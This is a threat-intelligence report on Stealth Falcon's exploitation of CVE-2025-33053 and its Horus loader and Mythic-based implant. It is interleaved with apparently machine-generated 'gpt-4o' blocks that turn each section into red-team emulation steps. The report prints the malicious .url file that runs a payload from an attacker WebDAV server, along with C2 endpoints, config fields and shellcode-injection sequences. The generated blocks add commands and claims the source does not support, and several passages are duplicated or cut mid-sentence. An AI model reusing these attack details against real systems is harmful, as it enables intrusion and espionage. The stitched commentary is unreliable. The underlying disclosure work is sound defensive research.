CVE-2025-33053, Stealth Falcon and Horus: A Saga of Middle Eastern Cyber Espionage samanthar@checkpoint.com Key Findings Check Point Research (CPR) discovered a new campaign conducted by the APT group Stealth Falcon. The attack used a .url file that exploited a zero-day vulnerability (CVE-2025-33053) to execute malware from an actor-controlled WebDAV server. CVE-2025-33053 allows remote code execution through manipulation of the working directory. Following CPR’s responsible disclosure, Microsoft today, June 10, 2025, released a patch as part of their June Patch Tuesday updates. Stealth Falcon’s activities are largely focused on the Middle East and Africa, with high-profile targets in the government and defense sectors observed in Turkey, Qatar, Egypt, and Yemen. Stealth Falcon continues to use spear-phishing emails as an infection method, often including links or attachments that utilize WebDAV and LOLBins to deploy malware. Stealth Falcon deploys custom implants based on open-source red team framework Mythic, which are either derived from existing agents or a private variant we dubbed Horus Agent. The customization not only introduce anti-analysis and anti-detection measures but also validate target systems before ultimately delivering more advanced payloads. In addition, the threat group employs multiple previously undisclosed custom payloads and modules, including keyloggers, passive backdoors, and a DC Credential Dumper. Introduction In March 2025, Check Point Research identified an attempted cyberattack against a defense company in Turkey. The threat actors used a previously undisclosed technique to execute files hosted on a WebDAV server they controlled, by manipulating the working directory of a legitimate built-in Windows tool. Following responsible disclosure, Microsoft assigned the vulnerability CVE-2025-33053 and released a patch on June 10, 2025, as part of their June Patch Tuesday updates. Based on tactics, techniques and procedure (TTPs), infrastructure, overlaps in code and targets profile, we attribute this activity to the Stealth Falcon threat group. Stealth Falcon (also known as FruityArmor) is an advanced persistent threat (APT) group known for conducting cyber espionage operations and has been active since at least 2012. Over the years, Stealth Falcon was observed acquiring zero-day exploits and using sophisticated custom-built payloads to target entities across the Middle East in their cyber espionage operations. In this report, we analyze the infection chains used by Stealth Falcon in recent years, including WebDAV- based exploitation of CVE-2025-33053 to deliver the Horus Agent, a custom implant built for the Mythic C2

Model: gpt-4o

Phase: Initial Access

• Technique: Spear-Phishing via Malicious URL
• Procedure: The attacker sends spear-phishing emails containing a URL link that, when accessed, exploits a zero-day vulnerability (CVE-2025-33053) to execute malware from an actor-controlled WebDAV server.

Phase: Execution

• Technique: URL File Exploitation via WebDAV
• Procedure: Exploits CVE-2025-33053 by using a .url file to manipulate the working directory of a legitimate Windows tool, enabling remote code execution from a WebDAV server.

Phase: Execution

• Technique: Living off the Land Binaries (LOLBins)
• Procedure: Utilizes legitimate Windows tools to execute malicious payloads without dropping additional executable files onto the system.

Phase: Persistence

• Technique: Custom Implants Deployment
• Procedure: Deploys custom implants based on the Mythic framework, specifically a variant dubbed the Horus Agent, which includes anti-analysis and anti-detection features.

Phase: Credential Access

• Technique: Credential Dumping with Custom Tool
• Procedure: Employs a DC Credential Dumper tool to extract credentials from compromised systems.

Phase: Command and Control

• Technique: Mythic C2 Framework
• Procedure: Uses the Mythic command and control server to manage compromised systems and deploy additional payloads.

Phase: Impact

• Technique: Keylogging and Passive Backdoors
• Procedure: Deploys modules for keylogging and establishing passive backdoors for continued access to compromised systems.

(Command and Control) open-source framework. Named after Horus, the Egyptian sky god who is often depicted as a falcon-headed man, the Horus Agent represents an evolution of the group’s previously used customized Apollo implant. We also highlight the capabilities of several previously undisclosed custom post- exploitation tools and modules within the threat group’s advanced espionage toolset. The Infection Chain: CVE-2025-33053 and .url files A file named TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.url (translation from Turkish: TLM.005 TELESCOPIC MAST DAMAGE REPORT.pdf.url) was submitted to VirusTotal by a source associated with a major Turkish defense company. Based on the name pattern and the previous history of Stealth Falcon attacks, this .url file was likely sent as an archived attachment in a phishing email. The content of the file: Plain text Copy to clipboard Open code in new window EnlighterJS 3 Syntax Highlighter [InternetShortcut] URL=C:\Program Files\Internet Explorer\iediagcmd.exe WorkingDirectory=\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr ShowCommand=7 IconIndex=13 IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Modified=20F06BA06D07BD014D [InternetShortcut] URL=C:\Program Files\Internet Explorer\iediagcmd.exe WorkingDirectory=\ \summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr ShowCommand=7 IconIndex=13 IconFile=C: \Program Files (x86)\Microsoft\Edge\Application\msedge.exe Modified=20F06BA06D07BD014D [InternetShortcut] URL=C:\Program Files\Internet Explorer\iediagcmd.exe WorkingDirectory=\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr ShowCommand=7 IconIndex=13 IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Modified=20F06BA06D07BD014D The URL parameter in this internet shortcut file points to iediagcmd.exe, a legitimate Diagnostics utility for Internet Explorer. Normally, when running, this utility spawns additional processes to collect diagnostic data, such as: ipconfig.exe /all netsh.exe in tcp show global

Model: gpt-4o

Phase: Initial Access

• Technique: Phishing via Malicious .url File
• Procedure: The attacker sends a phishing email with an archived attachment containing a .url file named TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.url, which points to a legitimate executable with a crafted working directory to trigger the payload.

Phase: Execution

• Technique: Abuse of Legitimate Utility
• Command: C:\Program Files\Internet Explorer\iediagcmd.exe
• Parameters:
  • WorkingDirectory=\\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr

Phase: Discovery

• Technique: System Network Configuration Discovery

• Command: ipconfig.exe /all

• Technique: Network Service Discovery

• Command: netsh.exe int tcp show global

Phase: Command and Control

• Technique: Use of Open Source Framework
• Procedure: An open-source C2 framework named "Horus" is employed to establish communications with the compromised system. This framework is an evolution of the group’s previously used Apollo implant.

Additional Tools

• Tool: Custom Post-Exploitation Tools and Modules
• Procedure: Utilizes undisclosed custom tools within their advanced espionage toolset for further exploitation and data exfiltration.

Note: The CTI report outlines several components of the attack, including specific command executions and the use of a custom C2 framework. Red team operations can emulate these tactics for simulations.

netsh.exe advfirewall firewall show rule name=all verbose route.exe print using the standard .NET Process.Start() method: Figure 1 – Legitimate iediagcmd.exe spawns auxiliary processes. LaunchProcess function uses under the hood the standard .NET Process.Start() method. According to the search order, Process.Start() function first searches for the executable to run in the current folder of a calling application. As the working folder is changed by the .url to the attacker-controlled WebDAV server path WorkingDirectory=\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr, the iediagcmd tool will run the route.exe executable the attackers placed in \ \summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr\route.exe instead of a legitimate one in system32 folder. Some artifacts in the malware we analyze later in the report suggest that the threat actors also abuse another legitimate executable, CustomShellHost.exe, in a similar manner, causing it to spawn explorer.exe from its working folder. A comparable technique, loading DLLs from a remote server via .url files and DLL hijacking, has been discussed before, but we didn’t observe it being used with executables until now. Upon reporting to Microsoft, the issue was assigned CVE-2025-33053. Following the execution of the .url file, the following multi-stage infection chain is unleashed:

Model: gpt-4o

Phase: Defense Evasion

• Technique: Firewall Rule Enumeration
• Command: netsh.exe advfirewall firewall show rule name=all verbose

Phase: Discovery

• Technique: Network Route Discovery
• Command: route.exe print

Phase: Execution

• Technique: Arbitrary Code Execution via Process Hijacking

• Procedure: Using the standard .NET Process.Start() method to execute route.exe from an attacker-controlled WebDAV server path instead of the legitimate system directory.

• Technique: Abusing Legitimate Process for Execution

• Procedure: The iediagcmd.exe spawns auxiliary processes by changing the working directory to an attacker-controlled path where the malicious executable is located, leading to the execution of route.exe.

Phase: Execution

• Technique: Hijacking Execution Flow
• Procedure: Use .url files to alter the working directory of iediagcmd.exe, resulting in running route.exe from the attacker's WebDAV server rather than the legitimate system path.

Phase: Execution

• Technique: Abuse of DLL Search Order Hijacking
• Procedure: The potential use of CustomShellHost.exe to spawn a malicious explorer.exe by manipulating the working directory similar to the method used with iediagcmd.exe.

This outlines the techniques and tools used by the threat actor for the attack, allowing red teams to replicate the methods for testing defenses.

Figure 2 – The infection chain. Route.exe – Horus Loader The malicious file route.exe that is executed from the attackers’ WebDAV server acts as a multi-stage loader. It’s written in C++ and uses Code Virtualizer, a code protection system that transforms code into custom virtual machine (VM) instructions, which makes it difficult for reverse engineers to analyze or modify. It is a lighter version of Themida protector, heavily used by Stealth Falcon previously, but lacks Themida’s additional obfuscation, anti-debugging, anti-tampering, and anti-hooking features. The loader is signed, but with an outdated signature without a TSA timestamp, likely to prevent auto-detections of some security products on unsigned samples using Code Virtualizer or Themida. Figure 3 – Digital certificate of the Horus loader. Horus Loader is highly customizable, with default values in the format ‘XXXXXX’ controlling each of its features: Cleaning up artifacts from previous stages Implementing evasions Dropping and executing the decoy document Loading the final payload Cleanup

Model: gpt-4o

Phase: Initial Access

• Technique: Execution through WebDAV Server
• Procedure: The attacker executes a malicious file named route.exe from a WebDAV server.

Phase: Execution

• Technique: Custom Payload Loader
• Tool/Program: route.exe (Horus Loader)
• Description: Acts as a multi-stage loader written in C++ using Code Virtualizer.
• Functionality:
  • Cleans up artifacts from previous stages.
  • Implements evasions to avoid detection.
  • Drops and executes a decoy document.
  • Loads the final payload.
• Notes: Signed with an outdated signature to bypass detections. It lacks advanced obfuscation features such as anti-debugging and anti-tampering, which are available in Themida.

Phase: Defense Evasion

• Technique: Code Virtualization
• Description: Uses Code Virtualizer to transform code into custom VM instructions to hinder reverse engineering and analysis.

The loader’s code includes an option to terminate processes from earlier stages of its execution. None of those is used in the sample we analyzed. However, this taskkill option enables us to deduce how else the loader was intended to be executed: Figure 4 – A default string (KILKIL) can be modified by the operators at compile time to terminate specific processes from earlier stages. For example, changing KILKIL to IEGIEG would allow them to kill iediagcmd.exe. We assume that it was not used in this sample because the loader has another cleanup option, which uses two dynamically created target processes to kill. Figure 5 – Code killing specified processes using dynamically creating constants. This code appears to have a bug: instead of terminating the previous stage processes, the two global constants are incorrectly set to “i” and “e.” As a result, the loader always attempts to terminate non-existent processes: taskkill.exe /IM i /F taskkill.exe /IM e /F Evasions The Horus Loader manually maps kernel32.dll and ntdll.dll for anti-analysis/anti-debug purposes. It also scans running processes for security solutions. If an antivirus process is detected, a global variable is set with an enum-based value representing the installed vendor. The check is performed against a list of 109 process names from 17 different vendors.

Model: gpt-4o

Phase: Defense Evasion

• Technique: Process Termination
• Command: taskkill.exe /IM i /F
• Command: taskkill.exe /IM e /F
• Procedure: The loader is designed to terminate processes from earlier stages. Although the analyzed sample does this incorrectly due to a bug, the intended function is by modifying a default string to specify target processes.

Phase: Defense Evasion

• Technique: Process Injection and API Unhooking
• Procedure: The Horus Loader manually maps kernel32.dll and ntdll.dll to evade analysis and debugging.

Phase: Discovery

• Technique: Security Software Discovery
• Procedure: The loader scans running processes for antivirus solutions by checking against a list of 109 process names from 17 vendors. If a match is found, a global variable is set with a specific enum-based value to represent the detected vendor.

Figure 6 – A part of code enumerating processes in search of security solutions. Depending on predefined flags, it can then decide whether to immediately stop execution based on the installed security vendor: Figure 7 – Code deciding to stop execution based on the security vendor. Decoy Document Decryption and Execution There are five different ways to execute the decoy, but in the code of the sample used against Turkish company, only one is implemented: Figure 8 – Decoy execution condition. The decoy or lure in this case is a PDF file stored in the .udata section. The loader decrypts the entire .udata section in memory, then writes the decrypted PDF file into the file%temp% \TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf, and opens it with cmd.exe: Figure 9 – Lure PDF document.

Model: gpt-4o

Phase: Execution

• Technique: Decoy Document Execution
• Procedure:
• Decryption and Loading: The loader decrypts the entire .udata section in memory.
• Writing to Disk: Writes the decrypted PDF file to %temp%\TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.

• Execution: Opens the PDF file using cmd.exe.

• Command: cmd.exe /c start %temp%\TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf

Payload Execution While the victim views the lure document, the loader continues executing the malicious infection chain in the background. The main payload is stored in the .xdata section. The loader decrypts it but instead of the expected shellcode or PE file, what’s revealed is a large list of IPv6 addresses: Figure 10 – IPfuscation of the payload within the Horus Loader. Those IPv6 addresses are then converted into the payload using thousands of calls to the function RtlIpv6StringToAddressA, which converts the IPv6 address to bytes. This is a known technique called “IPfuscation”. Next, the loader creates a suspended process: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe". It allocates and writes the payload into the process, then switches the main thread’s execution context. All of this happens inside a virtual machine, but Tiny Tracer was incredibly helpful in our analysis: Plain text Copy to clipboard Open code in new window EnlighterJS 3 Syntax Highlighter 59c1b;ntdll.ZwAllocateVirtualMemory 791e1;ntdll.ZwWriteVirtualMemory 791e1;ntdll.NtProtectVirtualMemory 59c1b;kernel32.GetThreadContext 7f687;kernel32.SetThreadContext 791e1;ntdll.NtResumeThread 7f687;kernel32.CloseHandle 791e1;kernel32.CloseHandle 59c1b;ntdll.ZwAllocateVirtualMemory 791e1;ntdll.ZwWriteVirtualMemory 791e1;ntdll.NtProtectVirtualMemory 59c1b;kernel32.GetThreadContext 7f687;kernel32.SetThreadContext 791e1;ntdll.NtResumeThread 7f687;kernel32.CloseHandle 791e1;kernel32.CloseHandle

Model: gpt-4o

Phase: Execution

• Technique: Payload Decryption and Execution via IPfuscation

• Procedure: The loader decrypts the main payload stored in the .xdata section by converting a large list of IPv6 addresses into bytes using the RtlIpv6StringToAddressA function (known as IPfuscation).

• Technique: Process Injection (Process Hollowing)

• Procedure:
  1. Command/Function: Create a suspended process: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe".
  2. Function: ntdll.ZwAllocateVirtualMemory - Allocates memory in the target process.
  3. Function: ntdll.ZwWriteVirtualMemory - Writes the decrypted payload into the allocated memory.
  4. Function: ntdll.NtProtectVirtualMemory - Changes memory protections to allow execution.
  5. Function: kernel32.GetThreadContext - Retrieves the context of the main thread.
  6. Function: kernel32.SetThreadContext - Modifies the main thread’s execution context.
  7. Function: ntdll.NtResumeThread - Resumes the suspended thread to execute the injected payload.
  8. Function: kernel32.CloseHandle - Closes handles to clean up.

59c1b;ntdll.ZwAllocateVirtualMemory 791e1;ntdll.ZwWriteVirtualMemory 791e1;ntdll.NtProtectVirtualMemory 59c1b;kernel32.GetThreadContext 7f687;kernel32.SetThreadContext 791e1;ntdll.NtResumeThread 7f687;kernel32.CloseHandle 791e1;kernel32.CloseHandle A shellcode is injected to the target process proceeds to decrypt another blob through a homebrew block- based cipher. The key and other properties for the decrypted block are stored in the shellcode: original region, size, key, checksum, etc. After decryption, we can see a blob with a partial PE file: Figure 11 – Compressed payload DLL. The decrypted blob requires certain DLLs to be preloaded, such as shell32.dll. The shellcode decompresses the payload DLL, manually maps it into memory, and executes its _1 export. Horus Agent: Custom Mythic Implant The final payload is a custom-built agent for Mythic, an open-source red teaming C2 framework. Written in C++, the implant shows no significant overlap with known C-based Mythic agents, aside from commonalities in the generic logic related to Mythic C2 communications. That’s why, similar to other Mythic implants named after Greek gods, we named this custom implant Horus, after the Egyptian man-falcon god. Code Obfuscation and Anti-Analysis Techniques While the loader makes sure to implement some measures to protect the payload, the threat actors placed additional precautions within the backdoor itself. Horus Agent uses what appears to be a custom OLLVM, using both string encryption and control flow flattening. The strings are encoded with a simple shift cipher subtracting 39 from each character, but automating the string decryption can be quite challenging, as the encrypted strings can reside on the stack or be referenced by a pointer to the data section:

Model: gpt-4o

Phase: Initial Access

• Technique: Code Injection
• Procedure: The threat actor utilizes API calls to inject shellcode into a target process. This includes calls to ZwAllocateVirtualMemory, ZwWriteVirtualMemory, and NtProtectVirtualMemory to manipulate memory regions within the process.

Phase: Execution

• Technique: Shellcode Execution
• Procedure: The injected shellcode decrypts a blob using a custom block-based cipher. It manages keys and other properties directly within the shellcode, preparing a partially constructed PE file for execution.

Phase: Defense Evasion

• Technique: Code Obfuscation
• Procedure: The payload implements custom OLLVM techniques, using string encryption with a shift cipher and control flow flattening. This complicates analysis and reverse engineering.

Phase: Payload Execution

• Technique: Manual DLL Mapping and Execution
• Procedure: The shellcode decompresses and manually maps a payload DLL into memory, preloading necessary DLLs like shell32.dll, and executes its export function.

Final Payload

• Payload: Horus Agent (Custom Mythic Implant)
• Details: A custom-built C++ agent for the Mythic C2 framework, featuring unique capabilities and advanced obfuscation techniques.

These structured procedures represent the key tactics and techniques observed from the threat actor's activity, enabling a red team to emulate similar actions.

Figure 12 – The code which retrieves and decrypts an obfuscated string from a loaded Windows module. This routine also gets into the control flow flattening, making the decompiled output look quite chaotic and useless. Figure 13 – String decryption in combination with control flow flattening. As most of the strings are stored in the .rdata section, we can decrypt them directly from there and skip analyzing the decryption routines during execution. These decryption routines usually run at the beginning of a function, followed by the actual function logic, so we can simply decrypt the strings from .rdata and move on to the core functionality of the function. Figure 14 – Decrypted strings. The Horus Agent also implements API Hashing, similar to other actors’ payloads. Horus first creates a structure for the required functions, assigns a hash value to each, and then resolves them all at once. The backdoor uses multiple import-resolving structures for various operations, including decryption, networking, COM, token manipulation, etc. Each structure is resolved only when it’s being used.

Model: gpt-4o

Phase: Obfuscation and Evasion

• Technique: String Decryption and Obfuscation

• Procedure: The threat actor uses control flow flattening and .rdata section decryption to obfuscate strings. They decrypt strings directly from the .rdata section rather than analyzing decryption routines during execution.

• Technique: API Hashing

• Procedure: The attacker implements API hashing to resolve necessary functions. A structure for required functions is created, with a hash assigned to each. Functions are resolved only when needed, hiding API calls from static analysis.

Potential Red Team Emulation Steps:

String Decryption

• Command/Code: Implement a script or tool to decrypt obfuscated strings from a binary's .rdata section.

API Hashing

• Command/Code: Develop or use an API hashing technique where a hash value for each Windows API function is calculated and resolved dynamically during execution, emulating the described behavior of resolving function calls only as required.

Figure 15 – API hashing. The first function executed before any malicious activity is started doesn’t really do anything. It contains calls to various Windows DLL functions, like GDI32, Winspool, User32, etc., but those functions are never actually executed at runtime. Figure 16 – Unused imports of the implant. This is likely intended to confuse static analysis engines, as including harmless-looking and common Windows API imports makes the DLL more closely resemble a legitimate Windows component. The same technique was observed in previous Stealth Falcon backdoors. Figure 17 – Conditional execution of some APIs that never run under normal conditions. Configuration and C2 communication All of the C2 configuration fields are stored in the implant and decrypted using RC4. Each field is decrypted

Model: gpt-4o

Phase: Defense Evasion

• Technique: API Hashing and Unused Imports
• Procedure: The threat actor includes calls to multiple Windows DLL functions (e.g., GDI32, Winspool, User32) in their initial execution flow. These functions are not executed at runtime, serving to confuse static analysis and make the DLL appear legitimate. This technique mimics traditional Windows components to evade detection.

Phase: Command and Control

• Technique: Encrypted Configuration Storage
• Procedure: The implant stores its C2 configuration fields encrypted using RC4. This encryption technique is used to protect the configuration from being easily read by analysts, ensuring secure command and control communication.

separately using the shared RC4 key which is modified based on its index. Another option existing in the payload is to load the config by decrypting a JSON and then loading it. Likely, the custom C2 server configuration was based on the httpx Mythic profile which supports multiple domains, AES encryption with HMAC, and other features included in the Horus agent. The config can be roughly represented by the following struct: Plain text Copy to clipboard Open code in new window EnlighterJS 3 Syntax Highlighter struct config { _BYTE padding1[24]; char uuid[37]; // hardcoded: bd10efec-3067-3329-620b-600d158dc62e _BYTE aes_key[32]; char rc4_c2_domain_1[256]; char rc4_c2_domain_2[256]; char rc4_c2_domain_3[256]; char rc4_c2_domain_4[256]; char rc4_killswitch_date[16]; // 31/12/2099 _BYTE rc4_dec_str_query_parameter[256]; // jNNsw _BYTE rc4_dec_str_c2_endpoint_get[256]; // PjH1BHszPooXyiHS3s _BYTE rc4_dec_str_c2_endpoint_post[256]; // uukEQ38A _BYTE rc4_user_agent[256]; // Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko _DWORD ukn_dword; _DWORD rand_base_1; _DWORD rand_base_2; _DWORD jitter_amount; _DWORD sleep_amount; _DWORD communication_timeout; _BYTE flag_create_mutex; _DWORD flag_config_from_raw_json; _BYTE rc4_raw_json[]; };

Model: gpt-4o

Phase: Configuration and Encryption Setup

• Technique: Custom C2 Configuration Setup
• Procedure:
• The threat actor uses a custom struct to handle configurations for the C2 communication.
• The configuration involves AES encryption with HMAC and multiple RC4 domain setup.
• Noteworthy fields include:
  • aes_key: Used for AES encryption.
  • rc4_c2_domain_1 to rc4_c2_domain_4: Domains for C2 communication.
  • rc4_killswitch_date: Date field for potential deactivation.
  • rc4_dec_str_query_parameter, rc4_dec_str_c2_endpoint_get, rc4_dec_str_c2_endpoint_post: Strings used for query parameters and C2 endpoints in RC4 encryption.
  • rc4_user_agent: Custom user agent string for HTTP requests.
• There's an option to load configuration data by decrypting an RC4-encrypted JSON.

Phase: Network Communication

• Technique: Encrypted C2 Communication
• Procedure:
• Communication with the C2 leverages domains configured with RC4 encryption.
• Utilizes an AES encrypted channel, supplemented by HMAC for integrity checks.
• Periodic data exchange is managed through configurable settings such as jitter_amount, sleep_amount, and communication_timeout.

Phase: Data Handling

• Technique: Configuration Management via JSON
• Procedure:
• The custom payload allows loading configurations by decrypting an RC4-encrypted JSON file when flag_config_from_raw_json is set.

The details extracted reflect a structured approach to encrypting communications and managing configurations. For a red team, emulating these setup processes could involve using AES and RC4 in similar configurations with domain communication channels as described.

struct config { _BYTE padding1[24]; char uuid[37]; // hardcoded: bd10efec-3067-3329-620b-600d158dc62e _BYTE aes_key[32]; char rc4_c2_domain_1[256]; char rc4_c2_domain_2[256]; char rc4_c2_domain_3[256]; char rc4_c2_domain_4[256]; char rc4_killswitch_date[16]; // 31/12/2099 _BYTE rc4_dec_str_query_parameter[256]; // jNNsw _BYTE rc4_dec_str_c2_endpoint_get[256]; // PjH1BHszPooXyiHS3s _BYTE rc4_dec_str_c2_endpoint_post[256]; // uukEQ38A _BYTE rc4_user_agent[256]; // Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko _DWORD ukn_dword; _DWORD rand_base_1; _DWORD rand_base_2; _DWORD jitter_amount; _DWORD sleep_amount; _DWORD communication_timeout; _BYTE flag_create_mutex; _DWORD flag_config_from_raw_json; _BYTE rc4_raw_json[]; }; struct config { _BYTE padding1[24];
char uuid[37]; // hardcoded: bd10efec-3067-3329-620b-600d158dc62e _BYTE aes_key[32];
char rc4_c2_domain_1[256];
char rc4_c2_domain_2[256];
char rc4_c2_domain_3[256];
char rc4_c2_domain_4[256];
char rc4_killswitch_date[16]; // 31/12/2099 _BYTE rc4_dec_str_query_parameter[256]; // jNNsw _BYTE rc4_dec_str_c2_endpoint_get[256]; // PjH1BHszPooXyiHS3s _BYTE rc4_dec_str_c2_endpoint_post[256]; // uukEQ38A _BYTE rc4_user_agent[256]; // Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko _DWORD ukn_dword;
_DWORD rand_base_1;
_DWORD rand_base_2;
_DWORD jitter_amount;
_DWORD sleep_amount;
_DWORD communication_timeout;
_BYTE flag_create_mutex;
_DWORD flag_config_from_raw_json;
_BYTE rc4_raw_json[];
}; The UUID is a hardcoded parameter which is generated when an agent is built. If the create_mutex flag is set, the backdoor creates a mutex with the same sample name as the UUID in the config. Mythic agents usually have 3 types of messages sent to the C2 server: The agent checks in with the C2 server – in our case, GET endpoint is used with the query parameter (/ PjH1BHszPooXyiHS3s?jNNsw=), data is sent in the query value. The agent polls its tasks – GET endpoint is used with the query parameter, data is sent in the query value The agent sends a response – POST endpoint is used with data sent in the body. The custom agent doesn’t change the protocol. After installation, the agent needs to register on the server

Model: gpt-4o

Phase: Command and Control (C2) Communication

• Technique: Encrypted C2 Communication

• Procedure: Uses a custom configuration structure with AES and RC4 for encryption.

• Technique: Mutex Creation

• Procedure: If the create_mutex flag is set, the malware creates a mutex using the UUID bd10efec-3067-3329-620b-600d158dc62e for instance uniqueness.

• Technique: C2 Check-in via HTTP GET

• Command: GET /PjH1BHszPooXyiHS3s?jNNsw=<data>

• Procedure: The agent checks in with the C2 server using a GET request with specified query parameters.

• Technique: Tasking via HTTP GET

• Command: GET /PjH1BHszPooXyiHS3s?jNNsw=<data>

• Technique: Command Execution Response via HTTP POST

• Command: POST /uukEQ38A

• Procedure: The agent sends execution results back to the C2 in the HTTP POST request body.

• Technique: User-Agent Spoofing

• Procedure: Uses the User-Agent string Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko to mimic legitimate traffic.

Phase: Persistence

• Technique: Scheduled Task or Registry Run Key (inferred)
• Procedure: Although not specified, custom agents often use persistent mechanisms after installation, possibly through scheduled tasks or registry keys.

Phase: Initial Access

• Technique: Installation and Registration
• Procedure: After initial installation, the agent registers itself with the C2 server, likely setting up necessary configuration and communication parameters.

(check-in). It collects initial information on the infected machine, such as username, OS, domain, etc. All of the data is gathered into a JSON that looks like this: Plain text Copy to clipboard Open code in new window EnlighterJS 3 Syntax Highlighter {"action":"checkin","ip":"x.x.x.x","os":"Windows 10 Pro","user":"user","host":"DESKTOP- HOST","domain":"domain","pid":1331,"uuid":"bd10efec-3067-3329-620b- 600d158dc62e","architecture":"amd64"} {"action":"checkin","ip":"x.x.x.x","os":"Windows 10 Pro","user":"user","host":"DESKTOP- HOST","domain":"domain","pid":1331,"uuid":"bd10efec-3067-3329-620b- 600d158dc62e","architecture":"amd64"} {"action":"checkin","ip":"x.x.x.x","os":"Windows 10 Pro","user":"user","host":"DESKTOP- HOST","domain":"domain","pid":1331,"uuid":"bd10efec-3067-3329-620b- 600d158dc62e","architecture":"amd64"} The sent data is encrypted with AES with HMAC for integrity. How this encryption is chosen likely stems from the C2 profiles the threat actors use. First, a random IV is generated, and the plain text is encrypted using the key in the configuration and the generated IV. Next, an HMAC-SHA256 checksum is computed over the IV and the encrypted JSON to ensure data integrity. Finally, the UUID is prepended to the data. A packet can be structured as follows: Plain text Copy to clipboard Open code in new window EnlighterJS 3 Syntax Highlighter struct network_packet{ byte UUID[36]; byte IV[16]; byte encrypted_data[]; byte hmac_sha256_checksum[16]; } struct network_packet{ byte UUID[36]; byte IV[16]; byte encrypted_data[]; byte hmac_sha256_checksum[16]; } struct network_packet{ byte UUID[36]; byte IV[16];

Model: gpt-4o

Phase: Discovery

• Technique: System Information Discovery
• Procedure: The malware gathers initial information from the infected machine, including:
• Username
• Operating System
• Domain
• Hostname
• Process ID (PID)
• UUID
• Architecture

Phase: Data Collection

• Technique: Data Encoding and Encryption
• Procedure:
• Action: Collect the system information into a structured JSON format.
• Encryption: Utilize AES encryption with a randomly generated IV.
• Integrity: Compute an HMAC-SHA256 checksum over the IV and the encrypted JSON.
• Transmission: Prepend UUID to the data for network packet transmission.

Technique: Custom Command and Control (C2) Protocol

• Procedure: Structure the network packet as follows:
• UUID: 36 bytes
• IV: 16 bytes
• Encrypted Data: Variable length
• HMAC-SHA256 Checksum: 16 bytes

byte encrypted_data[]; byte hmac_sha256_checksum[16]; } This entire packet is base64-encoded and sent to the C2 server in a query string. The C2 server should respond with a similar base64-encoded and encrypted network packet. This is how a decrypted JSON looks: Plain text Copy to clipboard Open code in new window EnlighterJS 3 Syntax Highlighter {"status":"success","id":"[semicolon-separated bot UID]","action":"checkin"} {"status":"success","id":"[semicolon-separated bot UID]","action":"checkin"} {"status":"success","id":"[semicolon-separated bot UID]","action":"checkin"} From this moment, all the communication between the server and the agent uses the newly received bot ID at the start of the packet. C2 Commands After check-in is successful, the backdoor goes into an endless loop that retrieves C2 commands (get_tasking action in the language of Mythic C2 protocol). The Horus Agent supports these commands: C2 Command Parameters Is Custom Description jobs none No Send a text visualization of all running jobs. survey none YesCollect more information on the system. config sleep/jitter/communication timeout, new value YesUpdate config values. exit none No Exit the program. ls path No List files / folder under a directory. shinjectchunked process name, shellcode, stealth modeYesInject shellcode into the same process or a different process. jobkill job id No Force kill a job. upload file data to upload from the c2 to the client, path to save the file No Download a file from the C2 server. Survey: custom enumeration function The survey command is a custom system enumeration function which collects data about: Services: uses the WMI query SELECT * FROM Win32_Service WHERE State='Running' with the ROOT\CIMV2 namespace to collect information about running services and save the

Model: gpt-4o

Phase: Command and Control

• Technique: Encrypted and Base64-encoded Communication
• Procedure: The threat actor uses base64-encoded and encrypted packets for communication, with a specific JSON format exchanged during check-ins.

Phase: C2 Command Processing

• Technique: Tasking Loop
• Procedure: After initial check-in, the backdoor enters a loop to retrieve and execute C2 commands via the Mythic C2 protocol.

Phase: Execution

• Technique: Command Execution
• Commands:
  • jobs : Displays all running jobs.
  • survey : Executes a custom system enumeration function.
  • config <sleep/jitter/timeout> <new value> : Updates configuration values.
  • exit : Exits the program.
  • ls <path> : Lists files or folders in a directory.
  • shinjectchunked <process name> <shellcode> <stealth mode> : Injects shellcode into a process.
  • jobkill <job id> : Terminates a running job.
  • upload <file data> <path> : Downloads a file from the C2 server and saves it locally.

Phase: Discovery

• Technique: System Information Discovery
• Procedure: Uses the survey command for custom system enumeration.
• Command: WMI query: SELECT * FROM Win32_Service WHERE State='Running'
  • Purpose: Collects information about running services using the ROOT\CIMV2 namespace.

fields DisplayName and ServiceName. Battery: uses the function GetSystemPowerStatus and then parses the returned SYSTEM_POWER_STATUS structure. An example output looks like this: "Battery": [ { "ACLineStatus": "1", "BatteryFlag": "8", "BatteryLifePercent": "72", "BatteryLifeTime": "5200", "BatteryFullLifeTime": "7200" } ] User: retrieves the %USERPROFILE% path and extracts the username. Processes: using Windows APIs to collect process ID, architecture, name, running user, path and the parent process ID. Network configuration: queries ROOT\CIMV2 namespace using FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = 'True', and parses the data which details the network settings of a system, such as hostname, IP addresses, DHCP and DNS settings, gateway, and network adapters information. Shinjectchunked While shinject, a command for injecting shellcode into a remote process, is built into Mythic and supported by some open-source agents, the threat actors developed their own version in their custom agent – one that is more powerful and highly customizable. The command offers several process injection methods, and its targeted executables appear to be located in the %SYSTEMROOT%\System32 directory. The shellcode itself can be sent in chunks, through multiple requests and then combined and injected as one blob. The C2 server sends several parameters with the shinjectchunked command. One of them is a process name: if the specified process is already running, the backdoor injects into the running instance. The command offers two injection methods, depending on whether the stealth parameter is provided. The first method, a classic process injection, is quite simple: open the process, allocate and write memory, and then create a remote thread.

